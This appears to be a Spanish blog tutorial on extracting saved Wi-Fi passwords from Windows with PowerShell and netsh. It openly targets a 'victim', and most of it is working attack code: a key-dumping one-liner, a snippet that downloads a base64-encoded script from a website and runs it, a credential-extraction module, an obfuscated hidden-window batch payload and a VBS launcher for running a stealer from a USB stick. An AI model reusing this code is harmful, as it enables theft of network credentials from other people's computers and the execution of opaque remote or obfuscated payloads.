Importar perfiles de wifi con Powershell Wlan-Profiles
¿Qué es Wifi?
Wifi es una tecnología de comunicación inalámbrica que permite conectar a internet equipos electrónicos, como computadoras, tablets, smartphones o celulares, etc., mediante el uso de radiofrecuencias o infrarrojos para la trasmisión de la información.
En este sentido, la tecnología wifi permite implementar redes de conexión a internet que beneficien a múltiples usuarios. Hoy en día, muchos locales públicos, como hoteles, aeropuertos, bares, restaurantes, centros comerciales, escuelas, universidades, oficinas y hospitales, están dotados de hotspots que ofrecen conexión wifi paga o gratuita.
Si ya te has conectado con tu PC o portátil Windows a una red con contraseña, y ahora quieres conectar también tu smartphone o alguien te pregunta la clave y no la recuerdas, es muy fácil “recuperarla” desde tu ordenador.
Instrucción
Ingresamos con la tecla windows y buscamos el programa PowerShell
(netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=
clear)}>>wifi.txt
se guardara todas las claves de wifi en el archivo txt con el codigo.
$url="https://www.jesusninoc.com/2017/01/24/hackear-wifi-con-powershell-script-codificado-en-base64/"
$result = Invoke-WebRequest $url
[String]$execute=$result.AllElements | Where class -eq 'crayon-pre' | %{$_.innerText}
Invoke-Expression "powershell -encodedcommand $execute"
Copiamos el código pegar en la consola de PowerShell y esperamos que se ejecute.
Obtendremos la clave de wifi de que estamos conectados, como la clave de nuestra victima si llegamos a enviar un script.
Copiamos el código en editor de texto "bloc de notas"
Guardamos en un archivo wifi.ps1
Luego abrimos PowerShell
Ingresamos en la consola de PowerShell .\wifi.ps1
Get-NetAdapter
Para ver información de la interfaz de red WiFi.
Get-NetAdapter -Name Wi-Fi
Mostrar cmdlets relacionados con el adaptador de red.
gcm -Noun netadapter | select name, modulename
Utilizando netsh.
netsh wlan show networks mode=bssid
Crear un script con PowerShell
Copiamos el código PowerShell en un editor de texto "bloc de notas"
Código Get-WlanProfiles.psm1
Function Get-WLAN_Profiles { | |
param ( | |
[ValidateSet('es-ES','en-EN')] | |
$LANGUAGE = $Host.CurrentUICulture.Name | |
) | |
$LANGUAGES = @{ | |
'es-ES' = New-Object psobject -Property @{ | |
'user_profiles_text' = 'Perfil de todos los usuarios' | |
'profile_not_found_text' = 'No se encuentra el perfil' | |
'ssid_name_text' = 'Nombre de SSID' | |
'network_type_text' = 'Tipo de red' | |
'authentication_text' = 'Autenticación' | |
'encryption_text' = 'Cifrado' | |
'key_text' = 'Contenido de la clave' | |
} | |
'en-EN' = New-Object psobject -Property @{ | |
'user_profiles_text' = 'All User Profile' | |
'profile_not_found_text' = 'Profile not found' | |
'ssid_name_text' = 'SSID name' | |
'network_type_text' = 'Network Type' | |
'authentication_text' = 'Authentication' | |
'encryption_text' = 'Cipher' | |
'key_text' = 'Key Content' | |
} | |
} | |
$LANG = $LANGUAGES."$LANGUAGE" | |
function getValueByName ( $inputText, $nameString ) { | |
$value = ""; | |
if ([regex]::IsMatch($inputText,"\b$nameString\b","IgnoreCase")) { | |
$value = ([regex]::Replace($inputText,"^[^:]*: ","")); | |
} | |
return $value.Trim(); | |
} | |
$Profiles = @() | |
netsh wlan show profiles | % { | |
$profile = getValueByName $_ $LANG.'user_profiles_text'; | |
if ($profile) { | |
$Profiles += $profile | |
} | |
} | |
$WLAN_Profiles = @() | |
$rowNumber = -1; | |
$Profiles | % { | |
$wlan_Profile = netsh wlan show profile $_ key=clear | |
if ($wlan_Profile.Contains($LANG.'profile_not_found_text')){ | |
return | |
} | |
$InterfaceName = $null | |
$wlan_Profile | % { | |
if (!($InterfaceName)) { | |
$InterfaceName = getValueByName $_ $LANG.'ssid_name_text' | |
$InterfaceName = $InterfaceName.Trim('"') | |
if ($InterfaceName) { | |
$row = New-Object PSObject -Property @{ | |
InterfaceName = $InterfaceName | |
SSID = $InterfaceName | |
NetworkType="" | |
Authentication="" | |
Encryption="" | |
Key="" | |
} | |
$rowNumber+=1 | |
$WLAN_Profiles += $row | |
#$WLAN_Profiles | ft | |
return | |
} | |
} | |
if (!($WLAN_Profiles[$rowNumber].NetworkType)) { | |
$NetworkType = getValueByName $_ $LANG.'network_type_text'; | |
if ($NetworkType) { | |
$WLAN_Profiles[$rowNumber].NetworkType = $NetworkType | |
} | |
} | |
if (!($WLAN_Profiles[$rowNumber].Authentication)) { | |
$Authentication = getValueByName $_ $LANG.'authentication_text'; | |
if ($Authentication) { | |
$WLAN_Profiles[$rowNumber].Authentication = $Authentication | |
} | |
} | |
if (!($WLAN_Profiles[$rowNumber].Encryption)) { | |
$Encryption = getValueByName $_ $LANG.'encryption_text'; | |
if ($Encryption) { | |
$WLAN_Profiles[$rowNumber].Encryption = $Encryption | |
} | |
} | |
if (!($WLAN_Profiles[$rowNumber].Key)) { | |
$Key = getValueByName $_ $LANG.'key_text'; | |
if ($Key) { | |
$WLAN_Profiles[$rowNumber].Key = $Key | |
} | |
} | |
} | |
} | |
if ($WLAN_Profiles.Count -gt 0) { | |
'Total WLAN_Profiles: ' + $WLAN_Profiles.Count | |
<#return#> $WLAN_Profiles | Select-Object SSID, | |
Authentication, | |
Key, | |
Encryption, | |
NetworkType | |
} else { | |
'No WLAN Profiles found!' | |
} | |
} |
Código Wlan-Profiles.bat
@echo off | |
powerSHeLl -NoPROf -NOLoGo -WInDoW HiDDEn -noNINteRaCTiV -C "Invoke-Expression ( ( New-Object Management.Automation.PSCredential ' ',('76492d1116743f0423413b16050a5345MgB8AHEAegBMAFcAaABGADYAdA BkACsAUAB uAHkATwBOADkATgBaADMAWQAyAFEAPQA9AHwANQBlA DgANQAzADYAYQA4ADEANwBhADYAZQA 4AGIAMgAyADYANAA0ADQ AYQA5ADQAYwAyADcAMwAwADQAOQA1ADcANAA4AGUAZQA3ADEAM wAx ADgAZQA5ADMANgAxADUAMgA3ADYANwAxADYAZQBlADEAYwA5 AGYANwA0ADkANwAyAGUAZABlAD AANgA1ADIAOQBmAGQAMABhAGY ANAA0AGUAOQBhADMAYgBkADUAYQAzADMAZgA1ADIAZQBlADQA OQA 0ADYAYwBlAGQAZgBkAGMAMgA4ADQAZQA0AGIANgBkADgANABlADkAN gAyADMAZgA5ADYAZgA zADYANwA1ADMAMgBiADUAOAAwADkAZABmAD EAMgA3AGIAOABiAGMAMAAxAGIAZQAyAGEANAAwAD IAZgA2AGMAZABh AGUANgBmADAAOQAxADgAOAAzAGIAMwBlADcANAAzADIAYgAwAGYAYgB jADIAY wAxADMAOAA1AGIAOAA1ADgAZgAxADUAZgAyADAAMQBiADMAYg AwADEAYgA5ADgAZgBkADEAMAA 3ADUAZABlADIAMwA4ADcAMAAwADYAN QBhADYAMAAwADEAOQBlADgAMQAxADMAMQAzADQANgBh AGYAMAAwAD IAMAAwADMAYQBjAGYAMQAxADgANQAxAGUAYwBkAGUANQBlADAAOABhA DkAMQA1A DYAMgBiADMAMQBhADUAZgAyAGQAZgA0ADUAMQBmADUAZgBj ADAAOAAxAGQAZQA1AGEAZQA1AG YAYwA4ADgAMgA2ADYAZAA2AGEAMAB kADAANgAyAGUAOAAwADgAMAA3AGEAOAA0ADAAMAA3ADM ANwAzAGUAOA BiAGIAZgBlADQAMgBlADAAOQAzADgANQBhAGUANQAzADEAYwBmADYAOABlADUA YQA4AGQAOAAwADMANgBkAGEANwAwADAANABmADQAYwBlADIAMgBjADYANwA 3ADMAZQBjADUAZ ABhADAAZgAzAGYAYQBhAGMANAA5ADYAMAA5AGUAOQBiAG QAMgBiADMANABiADMAZQBiADYANg BjADgAZgBlADQAZABkAGEAMABhADgAMgBj ADEAMQA4ADAAMQBkADYAOABjADMANQA4AGMAMQA 1AGQAZgBiADkAOQAxAD MAMgBhADUAMQA1ADAAZAA0AGEANgBjADMAOABmADkAOAA1ADIAOAA2A DQA YwBjADAAMgBjAGUAMQBhAGMAYQA3ADYAOABmAGEAMwBlADEAYQBlADQANgB lAGQAMQA2ADY AYQBlADAAYwBhADIAYwBkADIAZgA2ADUAZQAwADcANQBiADAA ZABlADEANAAzADkANAAzAGQAMw BlAGYAZgA2AGUANAA5AGQAZgAzADEAOAA5A GMAMQA5ADIAOQBkADIAYwBlADMAYwA1ADAAYQBjAD YAYgBjADEANgBjADUANgA1 ADQAMAA3AGQAYgA5ADMAOAAzAGEAMQAwAGMANAA1AGYANQBhADAAMA A4AG EAMwBkAGEAOAAxADkANgAyAGUAYQA2AGYANgAxADQAMQA4AGIANAA3AGMAMwAx ADYANgA3ADg AZAA2ADkAMwBkADIAMgAxADkAYgAzADMAZQAzADMAZgA0AGMAYgBh ADcAZgA0AGQAZQBjADIAZgA5 ADUANgA3AGIAZgA2ADgAZAAyAGUAMgA0ADMANAAyA GYAYgA5AGYAYgBkAGQANwA4ADYAMwA2AGUAY gAyAGEAYwAwADEANwAzADQAYQBj ADgANgA2ADUAOQAzADUAYgA3ADMAMgAzAGYANwAxADkAZQAwA DMAOAAyADYAYQ AzAGUAZQAwAGIANwBiAGQAOAAzAGMANAAwAGQAZQAxADUAYQBjAGIANgA3ADAA Y wBmADMAMAAwADEAMgBhADAAOQA4ADIAYQA2ADAAYwAyADMANgBjAGYAYgBlAGQ AOQA0AGUAYwBmA DQANgA3ADkAYgA1ADcAYgAwAGIANAAzADUAYwA4ADAAOABjAD gAMwA1AGEANwA1ADQAMwA3AGYANw BkADYAYgAzAGIANQAxAGIAOQAzAGEAMABiAD AAZAA1ADEAOQAwADkAOAA1ADMAZgBmADMAYgAyAD cANgBlAGIAZgBhADEAZgAwAD IAMgBjADcAMgA5AGYANAAyAGEAOABjADAAOAA5ADkAYwBlAGEAZgA 3AGUANgBiAGIA ZAA2AGYANQBjADkAMQBmAGEAMABlAGEAMAAwADIAYQA3AGUANwBmADcAYgAzAG E AYwA2ADcAZgAxAGIANgBhADEAMAA4ADQAMwBjADAANQA0ADIANABiADUANABjAGYAM AA1ADkA NwAzADMAYgAyAGMAZgBjAGEAOQBmADgANAA2ADgAZAA5AGUAMQA2AGQAZ AA5AGMANAAwADYAOQ A5AGMAZgAzADUAMQAxADcAYgAxADEAYwAyADUAZQBjADAAO AAyADUANwAzADUAMABjADkAMwBkA DMAMQA5ADEANgAzADgAMgAyAGEAZAAwADcAN QA5AGQAMgBkADQANABlAGIANwA3AGIAOAA3ADMAMAB iAGQAMgAxADYANgBjADQAN AA1AGYAOQA3AGIAYgA0AGMAMABlADAAZgA1ADMAMAA2AA== '|ConvertTo-SecureString -Key (167..182)) ).GetNetworkCredential().Password)" |
Código Wlan-Profiles.vbs
Set WshShell=CreateObject("WScript.Shell") | |
WshShell.Run chr(34) & "Wlan-Profiles.exe" & Chr(34),0 | |
Set WshShell=Nothing |
Script VBS atacar desde un dispositivos usb
Aplicación Wlan Profiles hackear contraseñas de wifi desde una usb
Copiar el archivo a la usb y desde ahí ejecutar para extraer las claves de wifi de nuestra victima.
Comentarios
Publicar un comentario
Únete a la conversación y comparte tú Opinión